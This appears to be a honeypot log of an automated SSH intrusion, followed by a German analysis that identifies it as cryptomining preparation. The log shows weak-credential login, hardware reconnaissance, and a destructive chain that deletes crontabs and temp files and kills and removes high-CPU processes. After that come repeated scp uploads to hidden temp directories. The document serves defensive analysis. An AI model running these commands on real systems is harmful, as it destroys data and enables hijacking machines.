07.10.2026, 23:24 UTC · 69 Befehle · über ssh · Niederlande · 12× wiederholt
user='odoo16' pass='raspberry' odoo16@srv01:~$ uname -m | awk '{printf $1}' x86_64 odoo16@srv01:~$ uptime | grep -ohe 'up .*' | sed 's/,//g' | awk '{ print $2" "$3 }' 262 days, 04:12 odoo16@srv01:~$ lspci | egrep VGA && lspci | grep 3D 00:02.0 VGA compatible controller: Intel Corporation Xeon E3-1200 v3/4th Gen Core Integrated Graphics Controller (rev 06) odoo16@srv01:~$ lscpu | egrep "Model name:" | cut -d ' ' -f 14- Intel(R) Xeon(R) CPU E5-2650 v3 @ 2.30GHz odoo16@srv01:~$ curl ipinfo.io/org AS14618 odoo16@srv01:~$ nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | wc -l | head -c 1 bash: nvidia-smi: command not found odoo16@srv01:~$ nvidia-smi -q | grep "Product Name" bash: nvidia-smi: command not found odoo16@srv01:~$ lspci | egrep VGA | grep Radeon | wc -l | head -c 1 0 odoo16@srv01:~$ uname -n | awk '{printf $1}' node3 odoo16@srv01:~$ uname -r | awk '{printf $1}' 5.4.0-150-generic odoo16@srv01:~$ crontab -r ; rm -rf /var/tmp/.* /var/tmp/* /tmp/.* /tmp/* ; ps aux | awk '$3 > 40.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; done ; ps aux | awk '$4 > 60.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; d… bash: pidof: command not found odoo16@srv01:~$ scp -qt "/var/tmp/fiJfgLLi" odoo16@srv01:~$ scp -qt "/tmp/fiJfgLLi" odoo16@srv01:~$ scp -qt "/dev/shm/fiJfgLLi" odoo16@srv01:~$ uname -s -v -n -r -m Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 node3 odoo16@srv01:~$ echo Qwerty12345 > /tmp/d.log odoo16@srv01:~$ scp -qt "/var/tmp/ZJIfbFqV" odoo16@srv01:~$ scp -qt "/tmp/ZJIfbFqV" odoo16@srv01:~$ scp -qt "/dev/shm/ZJIfbFqV" odoo16@srv01:~$ uname -s -v -n -r -m Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 node3 odoo16@srv01:~$ echo yahya > /tmp/d.log odoo16@srv01:~$ scp -qt "/var/tmp/LNFCHXOW" odoo16@srv01:~$ scp -qt "/tmp/LNFCHXOW" odoo16@srv01:~$ scp -qt "/dev/shm/LNFCHXOW" odoo16@srv01:~$ uname -s -v -n -r -m Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 node3 odoo16@srv01:~$ echo support > /tmp/d.log odoo16@srv01:~$ scp -qt "/var/tmp/FOlGOAJU" odoo16@srv01:~$ scp -qt "/tmp/FOlGOAJU" odoo16@srv01:~$ scp -qt "/dev/shm/FOlGOAJU" odoo16@srv01:~$ uname -s -v -n -r -m Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 node3 odoo16@srv01:~$ echo 1234567890 > /tmp/d.log odoo16@srv01:~$ scp -qt "/var/tmp/ChNRuEZt" odoo16@srv01:~$ scp -qt "/tmp/ChNRuEZt" odoo16@srv01:~$ scp -qt "/dev/shm/ChNRuEZt" odoo16@srv01:~$ uname -s -v -n -r -m Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 node3 odoo16@srv01:~$ echo 123123 > /tmp/d.log odoo16@srv01:~$ scp -qt "/var/tmp/pitrrWXm" odoo16@srv01:~$ scp -qt "/tmp/pitrrWXm" odoo16@srv01:~$ scp -qt "/dev/shm/pitrrWXm"
Der Angreifer meldete sich mit schwachen Zugangsdaten über SSH an und führte eine Reihe von Systemabfragen durch, um Hardwarekomponenten wie Prozessoren und Grafikkarten zu identifizieren. Anschließend löschte er temporäre Dateien und beendete Prozesse mit hoher CPU-Auslastung, um Ressourcen freizumachen. Danach lud er mehrere Dateien in verschiedene temporäre Verzeichnisse hoch und schrieb kurze Textstrings in eine Logdatei.
Die Befehle uname, lspci und lscpu sammeln Informationen über die Hardwarearchitektur und installierte Treiber. Der Aufruf von nvidia-smi prüft auf NVIDIA-Grafikkarten, was typisch für Mining ist, scheitert hier aber an fehlender Installation. Das Kommando crontab -r löscht geplante Aufgaben, während der folgende Shell-Loop Prozesse mit über 40 Prozent CPU-Auslastung beendet, um Ressourcen zu monopolisieren. Die scp-Befehle kopieren Dateien in versteckte oder temporäre Ordner wie /var/tmp, /tmp und /dev/shm, um Spuren zu verwischen und die Malware zu platzieren.
Das Vorgehen deutet stark auf die Vorbereitung von Kryptomining hin, da die Abfragen gezielt nach GPU-Modellen (NVIDIA, Radeon) und CPU-Leistung suchen. Das Löschen anderer Prozesse dient dazu, Rechenleistung für den Miner zu sichern, während die hochgeladenen Dateien vermutlich die Mining-Software selbst sind.
Dieses Muster ist sehr verbreitet und folgt einem standardisierten Skript für automatisierte Angriffe auf Linux-Server mit schwachen Passwörtern.